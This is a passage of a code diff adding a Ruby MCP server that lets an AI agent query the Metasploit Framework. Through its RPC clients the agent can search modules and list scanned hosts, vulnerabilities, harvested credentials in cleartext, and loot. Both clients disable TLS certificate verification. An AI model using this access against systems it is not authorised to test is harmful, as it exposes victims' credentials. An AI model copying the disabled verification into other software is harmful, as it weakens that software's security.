class RateLimitExceededError < Error
attr_reader :retry_after
def initialize(retry_after)
@retry_after = retry_after
super("Rate limit exceeded. Retry after #{retry_after} seconds.")
end
end
end
##
# Metasploit Client Layer Errors
#
module Metasploit
class AuthenticationError < Error; end
class ConnectionError < Error; end
class APIError < Error; end
class RpcStartupError < Error; end
end
end
@@ -0,0 +1,24 @@
# -*- coding: binary -*-
module Msf::MCP
module Logging
module Sinks
###
#
# This class implements the LogSink interface and backs it against a
# JSON file on disk.
#
###
class JsonFlatfile < Msf::MCP::Logging::Sinks::JsonStream
#
# Creates a JSON flatfile log sink instance that will be configured to log to
# the supplied file path.
#
def initialize(file)
super(File.new(file, 'a'))
end
end
end
end
end
@@ -0,0 +1,123 @@
# frozen_string_literal: true
module Msf::MCP
module Logging
module Sinks
# A Rex LogSink that formats log messages as JSON and writes them to
# an IO stream (e.g. $stdout, a File, a StringIO).
#
# @example Writing JSON logs to $stderr
# sink = Msf::MCP::Logging::Sinks::JsonStream.new($stderr)
# register_log_source('mcp', sink, Rex::Logging::LEV_0)
#
# @example Backed by a file via JsonFlatfile
# sink = Msf::MCP::Logging::Sinks::JsonFlatfile.new('msfmcp.log')
# register_log_source('mcp', sink, Rex::Logging::LEV_0)
class JsonStream
include Rex::Logging::LogSink
def initialize(stream)
@stream = stream
end
def log(sev, src, level, msg)
log_entry = {
timestamp: get_current_timestamp,
severity: sev.to_s.upcase,
level: level.to_s,
source: src.to_s,
message: msg.to_s
}
if msg.is_a?(Hash)
log_entry[:message] = msg[:message] if msg[:message] && !msg[:message].empty?
if msg[:context] && !msg[:context].empty?
log_entry[:context] = if debug_log_level?
msg[:context]
else
summarize_context(msg[:context])
end
end
if msg[:exception]
log_entry[:exception] = if msg[:exception].is_a?(Exception)
ex_msg = { class: msg[:exception].class.name, message: msg[:exception].message }
if get_log_level(LOG_SOURCE) >= BACKTRACE_LOG_LEVEL
ex_msg[:backtrace] = msg[:exception].backtrace&.first(5) || []
end
ex_msg
else
msg[:exception]
end
end
end
stream.write(log_entry.to_json + "\n")
stream.flush
end
def cleanup
stream.close
end
protected
attr_accessor :stream
private
# Keys whose values can be large (full API responses, tool results, etc.)
# and should be truncated at non-DEBUG log levels.
HEAVY_KEYS = %i[result body error].freeze
# Maximum character length for truncated values.
TRUNCATE_MAX_LENGTH = 1000
# Whether the current log level for the MCP source is at least DEBUG
# (LEV_3 / BACKTRACE_LOG_LEVEL), which enables full context output
# and exception backtraces.
#
# @return [Boolean]
def debug_log_level?
get_log_level(LOG_SOURCE) >= BACKTRACE_LOG_LEVEL
end
# Return a reduced copy of +ctx+ suitable for non-DEBUG log entries.
#
# Heavy keys (:result, :body, :error) are truncated. The :response sub-hash is also
# truncated. All other keys (scalars like :method, :elapsed_ms, :session_id) pass
# through unchanged.
#
# @param ctx [Hash] The original context hash
# @return [Hash] A summarized copy
def summarize_context(ctx)
return ctx unless ctx.is_a?(Hash)
ctx.each_with_object({}) do |(k, v), acc|
if HEAVY_KEYS.include?(k)
acc[k] = truncate_value(v)
elsif k == :response && v.is_a?(Hash)
acc[k] = v.each_with_object({}) do |(k_sub, v_sub), acc_sub|
acc_sub[k_sub] = HEAVY_KEYS.include?(k_sub) ? truncate_value(v_sub) : v_sub
end
else
acc[k] = v
end
end
end
# Truncate a value to a human-readable summary string.
#
# @param val [Object] The value to truncate
# @param max_length [Integer] Maximum character length before truncation
# @return [Object] The original value if short enough, otherwise a truncated string
def truncate_value(val, max_length: TRUNCATE_MAX_LENGTH)
str = val.is_a?(String) ? val : val.to_json
return val if str.length <= max_length
"#{str[0...max_length]}... (truncated, #{str.length} bytes)"
end
end
end
end
end
@@ -0,0 +1,111 @@
# frozen_string_literal: true
require 'rex/logging/log_sink'
module Msf::MCP
module Logging
module Sinks
# A Rex LogSink decorator that redacts sensitive information from log
# messages before delegating to a wrapped sink.
#
# @example Wrapping a JsonFlatfile sink
# inner = Msf::MCP::Logging::Sinks::JsonFlatfile.new('msfmcp.log')
# sink = Msf::MCP::Logging::Sinks::Sanitizing.new(inner)
# register_log_source('mcp', sink, Rex::Logging::LEV_0)
class Sanitizing
include Rex::Logging::LogSink
REDACTED = '[REDACTED]'
SENSITIVE_PATTERNS = {
password: /password[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
token_keyval: /token[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
token_header: /token\s+[a-zA-Z0-9_\-\.]+/i,
api_key: /api[_-]?key[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
secret: /secret[_-]?key[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
credential: /credential[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
auth: /auth[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
bearer: /bearer\s+[a-zA-Z0-9_\-\.]+/i
}.freeze
SENSITIVE_KEYS = /\A(password|token|secret|api_key|api_secret|credential|auth_token|bearer|access_token|private_key)\z/i
# @param sink [Rex::Logging::LogSink] The underlying sink to write to
def initialize(sink)
@sink = sink
end
def log(sev, src, level, msg)
@sink.log(sev, src, level, sanitize(msg))
end
def cleanup
@sink.cleanup
end
private
# Sanitize data for logging by redacting sensitive information.
#
# @param data [Object] Data to sanitize (Hash, Array, String, or other)
# @return [Object] Sanitized copy of data
def sanitize(data)
case data
when Hash
data.each_with_object({}) do |(k, v), result|
result[k] = if k.to_s.match?(SENSITIVE_KEYS)
v.is_a?(Hash) || v.is_a?(Array) ? sanitize(v) : REDACTED
elsif k.to_sym == :exception && v.is_a?(Exception)
ex_msg = { class: v.class.name, message: sanitize(v.message) }
if get_log_level(LOG_SOURCE) >= BACKTRACE_LOG_LEVEL
bt = v.backtrace&.first(5) || []
bt = bt.map{|x| x.sub(/^.*lib\//, 'lib/') } # Dont expose the install path
ex_msg[:backtrace] = sanitize(bt)
end
ex_msg
else
sanitize(v)
end
end
when Array
data.map { |item| sanitize(item) }
when String
sanitize_string(data)
else
data
end
end
# Sanitize a string by redacting sensitive patterns
#
# @param str [String] String to sanitize
# @return [String] Sanitized string
def sanitize_string(str)
return str unless str.is_a?(String)
sanitized = str.dup
# Redact sensitive patterns - match entire pattern and replace value part
SENSITIVE_PATTERNS.each do |name, pattern|
sanitized = sanitized.gsub(pattern) do |match|
# For header-style tokens (token abc123, bearer abc123), replace the value
# # TODO: check this
if name == :token_header || name == :bearer
parts = match.split(/\s+/, 2)
"#{parts[0]} #{REDACTED}"
# For key-value style (token: abc123, password=abc123), replace after separator
elsif match =~ /(.*[:=])\s*[\"']?/
"#{Regexp.last_match[1]} #{REDACTED}"
else
REDACTED
end
end
end
sanitized
end
end
end
end
end
+64
View File
@@ -0,0 +1,64 @@
# frozen_string_literal: true
require 'forwardable'
module Msf::MCP
module Metasploit
# Client facade that routes to the appropriate protocol implementation
# Supports MessagePack RPC (Metasploit's native protocol) and JSON-RPC
class Client
extend Forwardable
def_delegators :@client, :authenticate, :search_modules, :module_info, :db_hosts, :db_services, :db_vulns, :db_notes, :db_creds, :db_loot, :shutdown
##
# Initialize Metasploit client with explicit parameters
#
# @param api_type [String] API type: 'messagepack' or 'json-rpc'
# @param host [String] Metasploit host
# @param port [Integer] Metasploit port
# @param endpoint [String] API endpoint path
# @param token [String, nil] API token (for json-rpc)
# @param ssl [Boolean] Use SSL (default: true)
#
def initialize(api_type:, host:, port:, endpoint: nil, token: nil, ssl: true)
@client = create_client(api_type: api_type, host: host, port: port, endpoint: endpoint, token: token, ssl: ssl)
end
private
# Create the appropriate client based on API type
# @param api_type [String] API type: 'messagepack' or 'json-rpc'
# @param host [String] Metasploit host
# @param port [Integer] Metasploit port
# @param endpoint [String] API endpoint path
# @param token [String, nil] API token (for json-rpc)
# @param ssl [Boolean] Use SSL (default: true)
# @return [MessagePackClient, JsonRpcClient] Client instance
# @raise [Error] If invalid API type specified
def create_client(api_type:, host:, port:, endpoint: nil, token: nil, ssl: true)
case api_type
when 'messagepack'
require_relative 'messagepack_client'
MessagePackClient.new(
host: host,
port: port,
endpoint: endpoint || MessagePackClient::DEFAULT_ENDPOINT,
ssl: ssl
)
when 'json-rpc'
require_relative 'jsonrpc_client'
JsonRpcClient.new(
host: host,
port: port,
endpoint: endpoint || JsonRpcClient::DEFAULT_ENDPOINT,
ssl: ssl,
token: token
)
else
raise Error, "Invalid API type: #{api_type}"
end
end
end
end
end
@@ -0,0 +1,199 @@
# frozen_string_literal: true
require 'net/http'
require 'json'
module Msf::MCP
module Metasploit
# JSON-RPC 2.0 client for Metasploit Framework
# Implements bearer token authentication for the Metasploit JSON-RPC API
# Endpoint: /api/v1/json-rpc (default port 8081)
# See: lib/msf/core/rpc/json/ in Metasploit Framework repository
class JsonRpcClient
DEFAULT_ENDPOINT = '/api/v1/json-rpc'
# Initialize JSON-RPC client
# @param host [String] Metasploit RPC host
# @param port [Integer] Metasploit RPC port
# @param endpoint [String] API endpoint path (default: DEFAULT_ENDPOINT)
# @param token [String] Bearer authentication token
# @param ssl [Boolean] Use SSL (default: true)
def initialize(host:, port:, endpoint: DEFAULT_ENDPOINT, token:, ssl: true)
@host = host
@port = port
@endpoint = endpoint
@token = token
@request_id = 0
@http = nil
@ssl = ssl
end
# No-op for JSON-RPC: authentication uses a pre-configured bearer token.
# This method exists so that JsonRpcClient satisfies the same interface as
# MessagePackClient, allowing the Client facade to delegate uniformly.
#
# @param _user [String] Ignored
# @param _password [String] Ignored
# @return [String] The existing token
def authenticate(_user, _password)
@token
end
# Call Metasploit API method using JSON-RPC 2.0 format
# @param method [String] API method name
# @param args [Array] Arguments to pass to the method (must be an array)
# @return [Hash] API response
# @raise [AuthenticationError] If token is invalid
# @raise [APIError] If API returns error
# @raise [ConnectionError] If connection fails
# @raise [ArgumentError] If args is not an array
def call_api(method, args = [])
raise ArgumentError, "args must be an Array, got #{args.class}" unless args.is_a?(Array)
@request_id += 1
# Build JSON-RPC 2.0 request as a hash
request_body = {
jsonrpc: '2.0',
method: method,
params: args,
id: @request_id
}
# Send HTTP request
response = send_request(request_body)
# Check for JSON-RPC error
if response['error']
error_msg = response['error']['message'] || 'Unknown error'
raise APIError, error_msg
end
response['result']
end
# Search for Metasploit modules
# @param query [String] Search query
# @return [Array<Hash>] Module metadata
def search_modules(query)
call_api('module.search', [query])
end
# Get module information
# @param type [String] Module type ('exploit', 'auxiliary', 'post', etc.)
# @param name [String] Module name
# @return [Hash] Module information
def module_info(type, name)
call_api('module.info', [type, name])
end
# Get hosts from database
# @param options [Hash] Query options (workspace, limit, offset, etc.)
# @return [Hash] Response with 'hosts' array
def db_hosts(options = {})
call_api('db.hosts', [options])
end
# Get services from database
# @param options [Hash] Query options
# @return [Hash] Response with 'services' array
def db_services(options = {})
call_api('db.services', [options])
end
# Get vulnerabilities from database
# @param options [Hash] Query options
# @return [Hash] Response with 'vulns' array
def db_vulns(options = {})
call_api('db.vulns', [options])
end
# Get notes from database
# @param options [Hash] Query options
# @return [Hash] Response with 'notes' array
def db_notes(options = {})
call_api('db.notes', [options])
end
# Get credentials from database
# @param options [Hash] Query options
# @return [Hash] Response with 'creds' array
def db_creds(options = {})
call_api('db.creds', [options])
end
# Get loot from database
# @param options [Hash] Query options
# @return [Hash] Response with 'loots' array
def db_loot(options = {})
call_api('db.loots', [options])
end
# Shutdown client
def shutdown
@http&.finish if @http&.started?
@http = nil
end
private
# Send HTTP POST request with JSON-RPC payload
# @param request_body [Hash] JSON-RPC request body as a hash
# @return [Hash] Parsed response
# @raise [ConnectionError] If connection fails
# @raise [AuthenticationError] If token is invalid
def send_request(request_body)
# Create HTTP client if needed
unless @http
@http = Net::HTTP.new(@host, @port)
@http.use_ssl = @ssl
@http.verify_mode = OpenSSL::SSL::VERIFY_NONE if @ssl
end
# Create POST request
request = Net::HTTP::Post.new(@endpoint)
request['Content-Type'] = 'application/json'
request['Authorization'] = "Bearer #{@token}"
request.body = request_body.to_json
dlog({
message: 'JSON-RPC request',
context: { method: request.method, endpoint: @endpoint, body: request_body }
}, LOG_SOURCE, LOG_DEBUG)
# Send request and parse response
begin
response = @http.request(request)
parsed = case response.code.to_i
when 200
JSON.parse(response.body)
when 401
raise AuthenticationError, 'Invalid authentication token'
when 500
error_data = JSON.parse(response.body) rescue { 'error' => { 'message' => 'Internal server error' } }
error_msg = error_data.dig('error', 'message') || 'Internal server error'
raise APIError, error_msg
else
raise ConnectionError, "HTTP #{response.code}: #{response.message}"
end
dlog({
message: 'JSON-RPC response',
context: { status: response.code, body: parsed }
}, LOG_SOURCE, LOG_DEBUG)
parsed
rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH => e
raise ConnectionError, "Cannot connect to Metasploit RPC: #{e.message}"
rescue SocketError => e
raise ConnectionError, "Network error: #{e.message}"
rescue Timeout::Error => e
raise ConnectionError, "Request timeout: #{e.message}"
rescue EOFError => e
raise ConnectionError, "Empty response from Metasploit RPC: #{e.message}"
end
end
end
end
end
@@ -0,0 +1,262 @@
# frozen_string_literal: true
require 'net/http'
require 'msgpack'
module Msf::MCP
module Metasploit
# MessagePack RPC client for Metasploit Framework
# Implements authentication and API calls using MessagePack serialization
class MessagePackClient
DEFAULT_ENDPOINT = '/api/'
# Initialize MessagePack client
# @param host [String] Metasploit RPC host
# @param port [Integer] Metasploit RPC port
# @param endpoint [String] API endpoint path (default: DEFAULT_ENDPOINT)
# @param ssl [Boolean] Use SSL (default: true)
def initialize(host:, port:, endpoint: DEFAULT_ENDPOINT, ssl: true)
@host = host
@port = port
@endpoint = endpoint
@token = nil
@http = nil
@user = nil
@password = nil
@retry_count = 0
@max_retries = 2
@ssl = ssl
end
# Authenticate with Metasploit RPC
# @param user [String] Username
# @param password [String] Password
# @return [String] The resulting token if authentication successful
# @raise [AuthenticationError] If authentication fails
def authenticate(user, password)
# Store credentials for automatic re-authentication
@user = user
@password = password
# Send authentication request directly (bypass retry logic)
request_array = ['auth.login', user, password]
response = send_request(request_array)
# Real Metasploit API returns string keys
if response['result'] == 'success' && response['token']
@token = response['token']
elsif response['error']
raise AuthenticationError, response['error']
else
raise AuthenticationError, 'Authentication failed'
end
end
# Call Metasploit RPC API method
# @param method [String] API method name (e.g., 'module.search')
# @param args [Array] Arguments to pass to the method (must be an array)
# @return [Hash, Array] API response
# @raise [AuthenticationError] If authentication fails
# @raise [APIError] If API returns an error
# @raise [ConnectionError] If connection fails
# @raise [ArgumentError] If args is not an array
def call_api(method, args = [])
raise ArgumentError, "args must be an Array, got #{args.class}" unless args.is_a?(Array)
begin
raise AuthenticationError, 'Not authenticated' unless @token
# Build request array: [method, token, *args]
request_array = [method, @token, *args]
# Send HTTP request
send_request(request_array)
rescue AuthenticationError => e
# It is not possible to reauthenticate if we don't have credentials stored
raise unless @user && @password
# If reauthentication succeeded but the token is still invalid, we should not retry indefinitely
raise unless @retry_count < @max_retries
@retry_count += 1
@token = nil
begin
wlog({ message: "#{method}': #{e.message}. Attempting to re-authenticate (#{@retry_count}/#{@max_retries})" },
LOG_SOURCE, LOG_WARN)
authenticate(@user, @password)
rescue AuthenticationError => auth_e
wlog({ message: "Re-authentication failed: #{auth_e.message}" },
LOG_SOURCE, LOG_WARN)
if @retry_count < @max_retries
@retry_count += 1
@token = nil
retry
end
raise AuthenticationError, "Unable to authenticate after #{@retry_count} attempts: #{auth_e.message}"
end
# Retry the original request with new token
retry
end
rescue Msf::MCP::Error => e
elog({ message: 'MessagePack API call error', context: { error: e.message } },
LOG_SOURCE, LOG_ERROR)
raise
ensure
@retry_count = 0
end
# Search for Metasploit modules
# @param query [String] Search query
# @return [Array<Hash>] Module metadata
def search_modules(query)
call_api('module.search', [query])
end
# Get module information
# @param type [String] Module type ('exploit', 'auxiliary', 'post', etc.)
# @param name [String] Module name
# @return [Hash] Module information
def module_info(type, name)
call_api('module.info', [type, name])
end
# Get hosts from database
# @param options [Hash] Query options (workspace, limit, offset, etc.)
# @return [Hash] Response with 'hosts' array
def db_hosts(options = {})
call_api('db.hosts', [options])
end
# Get services from database
# @param options [Hash] Query options
# @return [Hash] Response with 'services' array
def db_services(options = {})
call_api('db.services', [options])
end
# Get vulnerabilities from database
# @param options [Hash] Query options
# @return [Hash] Response with 'vulns' array
def db_vulns(options = {})
call_api('db.vulns', [options])
end
# Get notes from database
# @param options [Hash] Query options
# @return [Hash] Response with 'notes' array
def db_notes(options = {})
call_api('db.notes', [options])
end
# Get credentials from database
# @param options [Hash] Query options
# @return [Hash] Response with 'creds' array
def db_creds(options = {})
call_api('db.creds', [options])
end
# Get loot from database
# @param options [Hash] Query options
# @return [Hash] Response with 'loots' array
def db_loot(options = {})
call_api('db.loots', [options])
end
# Shutdown client and cleanup
def shutdown
@token = nil
@user = nil
@password = nil
@http&.finish if @http&.started?
@http = nil
end
private
# Send HTTP POST request with MessagePack payload
# @param request_array [Array] Request data
# @return [Hash, Array] Parsed response
# @raise [AuthenticationError] If the token is not valid
# @raise [APIError] If the Metasploit API returns an error
# @raise [ConnectionError] If connection fails
def send_request(request_array)
# Create HTTP client if needed
unless @http
@http = Net::HTTP.new(@host, @port)
@http.use_ssl = @ssl
@http.verify_mode = OpenSSL::SSL::VERIFY_NONE if @ssl
end
# Encode request with MessagePack
request_body = request_array.to_msgpack
# Create POST request
request = Net::HTTP::Post.new(@endpoint)
request['Content-Type'] = 'binary/message-pack'
request.body = request_body
dlog({
message: 'MessagePack request',
context: { method: request.method, endpoint: @endpoint, body: sanitize_request_array(request_array) }
}, LOG_SOURCE, LOG_DEBUG)
# Send request and parse response
begin
response = @http.request(request)
parsed = case response.code.to_i
when 200
MessagePack.unpack(response.body)
when 401
error_data = MessagePack.unpack(response.body) rescue { 'error_message' => 'Authentication error' }
error_msg = error_data['error_message'] || error_data['error_string'] || 'Authentication error'
raise AuthenticationError, error_msg
when 500
error_data = MessagePack.unpack(response.body) rescue { 'error_message' => 'Internal server error' }
error_msg = error_data['error_message'] || error_data['error_string'] || 'Internal server error'
raise APIError, error_msg
else
raise ConnectionError, "HTTP #{response.code}: #{response.message}"
end
dlog({
message: 'MessagePack response',
context: { status: response.code, body: parsed }
}, LOG_SOURCE, LOG_DEBUG)
parsed
rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH => e
raise ConnectionError, "Cannot connect to Metasploit RPC: #{e.message}"
rescue SocketError => e
raise ConnectionError, "Network error: #{e.message}"
rescue Timeout::Error => e
raise ConnectionError, "Request timeout: #{e.message}"
rescue EOFError => e
raise ConnectionError, "Empty response from Metasploit RPC: #{e.message}"
end
end
REDACTED = '[REDACTED]'
# Sanitize request array for logging by redacting sensitive positional values
#
# For auth.login requests: redacts the password (last element)
# For API calls: redacts the token (second element)
#
# @param request_array [Array] Raw request array
# @return [Array] Sanitized copy with sensitive values redacted
def sanitize_request_array(request_array)
sanitized = request_array.dup
if sanitized[0] == 'auth.login'
sanitized[-1] = REDACTED
elsif sanitized.length > 1
sanitized[1] = REDACTED
end
sanitized
end
end
end
end
@@ -0,0 +1,216 @@
# frozen_string_literal: true
require 'time'
module Msf::MCP
module Metasploit
# Transforms Metasploit RPC responses into MCP-compatible format
# Adds metadata, converts field names, and formats timestamps
class ResponseTransformer
# Transform module search results
# @param modules [Array<Hash>] Raw module data from Metasploit
# @return [Array<Hash>] Transformed modules with MCP metadata
def self.transform_modules(modules)
return [] unless modules.is_a?(Array)
modules.map do |mod|
{
name: mod['name'] || mod['fullname'],
type: mod['type'],
fullname: mod['fullname'],
rank: mod['rank'],
disclosure_date: mod['disclosuredate']
}.compact
end
end
# Transform module info response
# @param info [Hash] Raw module info from Metasploit
# @return [Hash] Transformed info with MCP metadata
def self.transform_module_info(info)
return {} unless info.is_a?(Hash)
{
type: info['type'],
name: info['name'],
fullname: info['fullname'],
rank: info['rank'],
disclosure_date: info['disclosuredate'],
description: info['description'],
license: info['license'],
filepath: info['filepath']&.sub(/^.*modules\//, 'modules/'), # Dont expose the install path
architectures: info['arch'],
platforms: info['platform'],
authors: info['authors'],
privileged: info['privileged'],
has_check_method: info['check'],
# TODO: write transformer for default_options
default_options: info['default_options'],
references: transform_references(info['references']),
targets: info['targets'],
default_target: info['default_target'],
stance: info['stance'],
actions: info['actions'],
default_action: info['default_action'],
# TODO: write transformer for options
options: info['options']
}.compact
end
# Transform hosts response
# @param response [Hash] Raw response with 'hosts' array
# @return [Array<Hash>] Transformed hosts with MCP metadata
def self.transform_hosts(response)
return [] unless response.is_a?(Hash) && response['hosts'].is_a?(Array)
response['hosts'].map do |host|
{
created_at: format_timestamp(host['created_at']),
address: host['address'],
mac_address: host['mac'],
hostname: host['name'],
state: host['state'],
os_name: host['os_name'],
os_flavor: host['os_flavor'],
os_service_pack: host['os_sp'],
os_language: host['os_lang'],
updated_at: format_timestamp(host['updated_at']),
purpose: host['purpose'],
info: host['info']
}.compact
end
end
# Transform services response
# @param response [Hash] Raw response with 'services' array
# @return [Array<Hash>] Transformed services
def self.transform_services(response)
return [] unless response.is_a?(Hash) && response['services'].is_a?(Array)
response['services'].map do |service|
{
host_address: service['host'],
created_at: format_timestamp(service['created_at']),
updated_at: format_timestamp(service['updated_at']),
port: service['port'],
protocol: service['proto'],
state: service['state'],
name: service['name'],
info: service['info'],
}.compact
end
end
# Transform vulnerabilities response
# @param response [Hash] Raw response with 'vulns' array
# @return [Array<Hash>] Transformed vulnerabilities
def self.transform_vulns(response)
return [] unless response.is_a?(Hash) && response['vulns'].is_a?(Array)
response['vulns'].map do |vuln|
{
host: vuln['host'],
port: vuln['port'],
protocol: vuln['proto'],
name: vuln['name'],
references: parse_refs(vuln['refs']),
created_at: format_timestamp(vuln['time'])
}.compact
end
end
# Transform notes response
# @param response [Hash] Raw response with 'notes' array
# @return [Array<Hash>] Transformed notes
def self.transform_notes(response)
return [] unless response.is_a?(Hash) && response['notes'].is_a?(Array)
response['notes'].map do |note|
{
host: note['host'],
service_name_or_port: note['service'],
note_type: note['type'] || note['ntype'],
data: note['data'],
created_at: format_timestamp(note['time'])
}.compact
end
end
# Transform credentials response
# @param response [Hash] Raw response with 'creds' array
# @return [Array<Hash>] Transformed credentials
def self.transform_creds(response)
return [] unless response.is_a?(Hash) && response['creds'].is_a?(Array)
response['creds'].map do |cred|
{
host: cred['host'],
port: cred['port'],
protocol: cred['proto'],
service_name: cred['sname'],
user: cred['user'],
secret: cred['pass'],
type: cred['type'],
updated_at: format_timestamp(cred['updated_at'])
}.compact
end
end
# Transform loot response
# @param response [Hash] Raw response with 'loots' array
# @return [Array<Hash>] Transformed loot
def self.transform_loot(response)
return [] unless response.is_a?(Hash) && response['loots'].is_a?(Array)
response['loots'].map do |loot|
{
host: loot['host'],
service_name_or_port: loot['service'],
loot_type: loot['ltype'],
content_type: loot['ctype'],
name: loot['name'],
info: loot['info'],
data: loot['data'],
created_at: format_timestamp(loot['created_at']),
updated_at: format_timestamp(loot['updated_at'])
}.compact
end
end
private
# Convert Unix epoch timestamp to ISO 8601 format
# @param timestamp [Integer, nil] Unix timestamp
# @return [String, nil] ISO 8601 formatted string
def self.format_timestamp(timestamp)
return nil if timestamp.nil? || timestamp.to_i.zero?
Time.at(timestamp.to_i).utc.iso8601
end
# Transform references array
# @param refs [Array, nil] References from Metasploit
# @return [Array<Hash>, nil] Transformed references
def self.transform_references(refs)
return nil unless refs.is_a?(Array)
refs.map do |ref|
if ref.is_a?(Array) && ref.length == 2
{ type: ref[0], value: ref[1] }
else
ref
end
end
end
# Parse comma-separated reference string
# Note there can have some issues if the ref values themselves contain commas,
# but it is the way the MSF RPC API returns them.
# @param refs [String, nil] Comma-separated refs
# @return [Array<String>, nil] Array of references
def self.parse_refs(refs)
return nil if refs.nil? || refs.empty?
refs.to_s.split(',').map(&:strip).reject(&:empty?)
end
end
end
end
@@ -0,0 +1,187 @@
# frozen_string_literal: true
module Msf::MCP
module Middleware
##
# Rack middleware that logs MCP HTTP request/response details via Rex logging.
#
# Focuses on the HTTP transport layer: request method, status code, session ID,
# content type, and round-trip timing. For POST requests it also extracts
# JSON-RPC fields (method, id, params) and response result/error to provide
# DEBUG-level visibility into the exchange.
#
# MCP-level business details (tool names, tool durations, and structured
# results) are handled by the SDK's +around_request+ callback configured
# in Server, avoiding duplication.
#
# @example Usage in a Rack::Builder
# Rack::Builder.new do
# use Msf::MCP::Middleware::RequestLogger
# run transport
# end
#
class RequestLogger
##
# @param app [#call] The next Rack application in the middleware stack
#
def initialize(app)
@app = app
end
##
# Process the request, delegating to the next Rack app and logging
# transport-level details after the response is produced.
#
# @param env [Hash] The Rack environment
# @return [Array] The Rack response triplet [status, headers, body]
#
def call(env)
request = Rack::Request.new(env)
started_at = Process.clock_gettime(Process::CLOCK_MONOTONIC)
response = @app.call(env)
elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - started_at
log_exchange(request, response, elapsed)
response
end
private
##
# Log a single request/response entry at the HTTP transport level.
#
# Dispatches to {#log_post_exchange} for POST requests (which extracts
# JSON-RPC fields). GET, DELETE, and other methods are logged directly
# with status and timing information.
#
# @param request [Rack::Request] The incoming HTTP request
# @param response [Array] The Rack response [status, headers, body]
# @param elapsed [Float] Wall-clock seconds for the round-trip
#
def log_exchange(request, response, elapsed)
status, headers, _body = response
session_id = request.env['HTTP_MCP_SESSION_ID'] || headers&.fetch('Mcp-Session-Id', nil)
elapsed_ms = (elapsed * 1000).round(2)
context = { elapsed_ms: elapsed_ms }
context[:session_id] = session_id if session_id
case request.request_method
when 'POST'
log_post_exchange(request, response, context)
when 'GET'
context[:response] = build_response_context(response)
ilog({ message: "SSE stream opened (#{elapsed_ms}ms)", context: context }, LOG_SOURCE, LOG_INFO)
when 'DELETE'
context[:response] = build_response_context(response)
ilog({ message: "Session deleted (#{elapsed_ms}ms)", context: context }, LOG_SOURCE, LOG_INFO)
else
context[:response] = build_response_context(response)
dlog({ message: "HTTP #{request.request_method} #{status} (#{elapsed_ms}ms)", context: context }, LOG_SOURCE, LOG_DEBUG)
end
end
##
# Log a POST exchange with JSON-RPC params and response result/error
# nested under :request and :response keys.
#
# For streaming responses (Proc body), the result is not available here —
# it is logged by the +around_request+ callback in Server instead.
#
# Distinguishes between:
# - Notifications (no id): logged at DEBUG since the SDK instrumentation
# does not fire for these
# - Requests with HTTP errors: logged at ERROR with the error details
# - Normal requests: logged at DEBUG with params and result
# (the +around_request+ callback provides the INFO-level business log)
#
# @param request [Rack::Request] The incoming HTTP request
# @param response [Array] The Rack response [status, headers, body]
# @param context [Hash] Pre-built context hash with session_id and elapsed_ms
#
def log_post_exchange(request, response, context)
context[:request] = {}
jsonrpc = extract_jsonrpc_fields(request)
if jsonrpc
context[:request][:method] = jsonrpc[:method] if jsonrpc[:method]
context[:request][:id] = jsonrpc[:id] if jsonrpc[:id]
context[:request][:params] = jsonrpc[:params] if jsonrpc[:params]
end
context[:response] = build_response_context(response)
response_body = extract_response_body(response)
if response_body
context[:response][:result] = response_body[:result] if response_body[:result]
context[:response][:error] = response_body[:error] if response_body[:error]
end
method_name = context[:request][:method] || 'unknown'
if context[:request][:id].nil? && context[:request][:method]
# Notification — no instrumentation fires for these
dlog({ message: "Notification: #{method_name} #{context[:response][:status]} (#{context[:elapsed_ms]}ms)", context: context }, LOG_SOURCE, LOG_DEBUG)
elsif context[:response][:status] >= 400
elog({ message: "HTTP #{context[:response][:status]}: #{method_name} (#{context[:elapsed_ms]}ms)", context: context }, LOG_SOURCE, LOG_ERROR)
else
dlog({ message: "HTTP #{context[:response][:status]}: #{method_name} id=#{context[:request][:id]} (#{context[:elapsed_ms]}ms)", context: context }, LOG_SOURCE, LOG_DEBUG)
end
end
##
# Build the response portion of the log context from the Rack response.
#
# @param response [Array] The Rack response [status, headers, body]
# @return [Hash] Response context with :status and :content_type
#
def build_response_context(response)
status, headers, _body = response
res = { status: status }
res[:content_type] = headers['Content-Type'] if headers&.key?('Content-Type')
res
end
##
# Extract JSON-RPC method, id, and params from the request body.
#
# Rewinds before and after reading so downstream handlers can still
# consume the body.
#
# @param request [Rack::Request] The incoming HTTP request
# @return [Hash, nil] Parsed fields (:method, :id, :params), or nil on
# parse failure
#
def extract_jsonrpc_fields(request)
request.body.rewind
body = request.body.read
request.body.rewind
parsed = JSON.parse(body)
{ method: parsed['method'], id: parsed['id'], params: parsed['params'] }
rescue JSON::ParserError
nil
end
##
# Extract result or error from the response body.
#
# Only parses Array bodies (direct JSON responses). SSE stream responses
# (Proc bodies) are not parseable here — their results are logged by the
# +around_request+ callback in Server.
#
# @param response [Array] The Rack response [status, headers, body]
# @return [Hash, nil] Parsed fields (:result, :error), or nil if the body
# is empty, non-Array, or unparseable
#
def extract_response_body(response)
_status, _headers, body = response
return nil unless body.is_a?(Array) && !body.empty?
parsed = JSON.parse(body.first)
{ result: parsed['result'], error: parsed['error'] }
rescue JSON::ParserError
nil
end
end
end
end
+302
View File
@@ -0,0 +1,302 @@
# frozen_string_literal: true
require 'securerandom'
require 'socket'
module Msf::MCP
# Manages the lifecycle of a Metasploit RPC server process.
#
# Probes the configured RPC port, auto-starts the server via Process.spawn
# of msfrpcd, and cleans up the child process on shutdown.
class RpcManager
LOCALHOST_HOSTS = %w[localhost 127.0.0.1 ::1].freeze
DEFAULT_WAIT_TIMEOUT = 30
DEFAULT_WAIT_INTERVAL = 1
STOP_GRACE_PERIOD = 5
attr_reader :rpc_pid
# @param config [Hash] Application configuration hash
# @param output [IO] Output stream for status messages
def initialize(config:, output:)
@config = config
@output = output
@rpc_pid = nil
@rpc_managed = false
end
# Whether this manager started and is managing an RPC server process.
#
# @return [Boolean]
def rpc_managed?
@rpc_managed
end
# Probe the configured RPC port to check if a server is listening.
#
# @return [Boolean]
def rpc_available?
host = @config[:msf_api][:host]
port = @config[:msf_api][:port]
socket = Rex::Socket::Tcp.create(
